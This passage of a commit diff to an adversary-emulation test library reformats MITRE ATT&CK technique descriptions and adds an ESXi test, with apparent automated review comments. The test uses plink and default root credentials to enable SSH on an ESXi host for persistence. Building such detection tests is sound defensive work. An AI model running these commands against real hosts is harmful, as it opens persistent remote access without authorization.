<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
<blockquote>
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)</blockquote>
Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,12 +1,16 @@
# T1021.003 - Remote Services: Distributed Component Object Model
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/003)
<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
<blockquote>
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)</blockquote>
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)
</blockquote>
## Atomic Tests
+63 -3
View File
@@ -1,20 +1,26 @@
# T1021.004 - Remote Services: SSH
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/004)
<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
<blockquote>
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the users public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.</blockquote>
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the users public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.
</blockquote>
## Atomic Tests
- [Atomic Test #1 - ESXi - Enable SSH via PowerCLI](#atomic-test-1---esxi---enable-ssh-via-powercli)
- [Atomic Test #2 - ESXi - Enable SSH via VIM-CMD](#atomic-test-2---esxi---enable-ssh-via-vim-cmd)
<br/>
## Atomic Test #1 - ESXi - Enable SSH via PowerCLI
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
**Supported Platforms:** Linux
**Supported Platforms:** Windows
**auto_generated_guid:** 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec
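Review bot: the Supported Platforms line for Test #1 flips from Linux to Windows with nothing else in the hunk explaining why; the test is driven by PowerCLI from PowerShell, which also runs on Linux, so if the test is now only validated on Windows the description should say so, otherwise keep both platforms listed. While the description is being touched, `a ESXi host` should read `an ESXi host` and `carryout` should be `carry out`.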
@@ -64,4 +70,58 @@ Install-Module -Name VMware.PowerCLI
<br/>
<br/>
## Atomic Test #2 - ESXi - Enable SSH via VIM-CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
**Supported Platforms:** Windows
**auto_generated_guid:** 280812c8-4dae-43e9-a74e-1d08ab997c0e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vm_host | Specify the host name or IP of the ESXi server. | string | atomic.local|
| vm_user | Specify the privilege user account on the ESXi server. | string | root|
| vm_pass | Specify the privileged user's password. | string | password|
| plink_file | Path to Plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
```
#### Cleanup Commands:
```cmd
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/disable_ssh"
```
#### Dependencies: Run with `powershell`!
##### Description: Check if we have plink
##### Check Prereq Commands:
```powershell
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
```
<br/>
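Review bot: the attack command for Test #2 reaches the host over SSH (`"#{plink_file}" ... -ssh ... "vim-cmd hostsvc/enable_ssh"`) in order to enable SSH, so it can only succeed where the SSH service is already running, and the cleanup (`vim-cmd hostsvc/disable_ssh`) then switches off a service that was on before the test started. State that precondition in the description (the linked LOLESXi entry shows `vim-cmd` run from an existing ESXi shell) and consider making the cleanup restore the prior state instead of disabling unconditionally. Also `creeate` should be `create`.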
+42 -2
View File
@@ -6,7 +6,7 @@ atomic_tests:
description: |
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
supported_platforms:
- linux
- windows
input_arguments:
vm_host:
description: Specify the host name of the ESXi Server
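Review bot: the `supported_platforms` switch from `linux` to `windows` is the only functional change in this hunk, but the surrounding context still carries `a ESXi host` and `carryout` in the description, and the `vm_host` description here (`Specify the host name of the ESXi Server`) differs from the wording used for the same argument in the new test (`host name or IP`); worth aligning both while the file is open.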
@@ -40,4 +40,44 @@ atomic_tests:
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Stop-VMHostService -Confirm:$false
name: powershell
elevation_required: true
elevation_required: true
- name: ESXi - Enable SSH via VIM-CMD
auto_generated_guid: 280812c8-4dae-43e9-a74e-1d08ab997c0e
description: |
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
dependency_executor_name: powershell
dependencies:
- description: |
Check if we have plink
prereq_command: |
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: |
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
cleanup_command: |
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/disable_ssh"
name: command_prompt
elevation_required: false
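Review bot: `-batch` and the leading `echo "" |` in the `command` and `cleanup_command` work against each other: `-batch` makes plink abandon the connection instead of prompting when the server's host key is not already cached, so the piped input never answers anything and a first run against a fresh `vm_host` fails before `vim-cmd` executes (in `cmd`, `echo ""` also emits the two quote characters, not an empty line). Either document that the host key must be cached beforehand or add a `-hostkey` input argument carrying the ESXi host's fingerprint. Note too that `-pw "#{vm_pass}"` places the root password in the plink command line; acceptable for a test, but it will show up in process creation telemetry and should be called out for anyone running this against a shared lab host.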
+6 -2
View File
@@ -1,10 +1,14 @@
# T1021.005 - Remote Services:VNC
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/005)
<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computers display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
<blockquote>
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computers display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)
Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)</blockquote>
Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)
</blockquote>
## Atomic Tests
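Review bot: moving `<blockquote>` onto its own line does not change how the description renders: under CommonMark, which GitHub follows, a line beginning with `<blockquote>` opens an HTML block that continues to the next blank line and is passed through as raw HTML, so Markdown links in that first paragraph such as `[Valid Accounts](https://attack.mitre.org/techniques/T1078)` still come out as literal text, exactly as with the old single-line form. If this sweep across the technique files is only about line layout that is fine; if the aim is to get those links to render, a blank line is needed after the opening tag so the paragraph is parsed as Markdown.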
+6 -2
View File
@@ -1,8 +1,12 @@
# T1021.006 - Remote Services: Windows Remote Management
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/006)
<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
<blockquote>
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)</blockquote>
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,8 +1,12 @@
# T1025 - Data from Removable Media
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1025)
<blockquote>Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
<blockquote>
Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.</blockquote>
Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,8 +1,12 @@
# T1027.001 - Obfuscated Files or Information: Binary Padding
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/001)
<blockquote>Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.
<blockquote>
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) </blockquote>
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,8 +1,12 @@
# T1027.002 - Obfuscated Files or Information: Software Packing
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/002)
<blockquote>Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)
<blockquote>
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing) </blockquote>
Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,8 +1,12 @@
# T1027.004 - Obfuscated Files or Information: Compile After Delivery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/004)
<blockquote>Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
<blockquote>
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)</blockquote>
Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,10 +1,14 @@
# T1027.006 - HTML Smuggling
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/006)
<blockquote>Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
<blockquote>
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.
For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)</blockquote>
For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,12 +1,16 @@
# T1027.007 - Obfuscated Files or Information: Dynamic API Resolution
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/007)
<blockquote>Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.
<blockquote>
Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.
API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)</blockquote>
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,12 +1,16 @@
# T1027 - Obfuscated Files or Information
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027)
<blockquote>Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
<blockquote>
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript.
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) </blockquote>
Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)
</blockquote>
## Atomic Tests
+5 -1
View File
@@ -1,6 +1,10 @@
# T1030 - Data Transfer Size Limits
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1030)
<blockquote>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</blockquote>
<blockquote>
An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
</blockquote>
## Atomic Tests
+6 -2
View File
@@ -1,10 +1,14 @@
# T1033 - System Owner/User Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1033)
<blockquote>Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
<blockquote>
Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)</blockquote>
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
</blockquote>
## Atomic Tests
+5 -1
View File
@@ -1,6 +1,10 @@
# T1036.003 - Masquerading: Rename System Utilities
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/003)
<blockquote>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</blockquote>
<blockquote>
